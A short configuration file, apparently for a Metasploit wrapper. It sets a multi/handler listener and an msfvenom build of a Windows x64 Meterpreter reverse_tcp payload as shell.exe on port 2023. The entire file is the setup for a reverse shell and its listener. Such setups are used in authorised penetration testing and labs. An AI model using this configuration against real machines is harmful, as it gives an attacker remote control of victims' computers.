[msfconsole]
lhost = eth0
lport = 2023
payload = windows/x64/meterpreter/reverse_tcp
handler = exploit/multi/handler

[msfvenom]
lhost = eth0
lport = 2023
format = exe
payload = windows/x64/meterpreter/reverse_tcp
output_filename = shell.exe
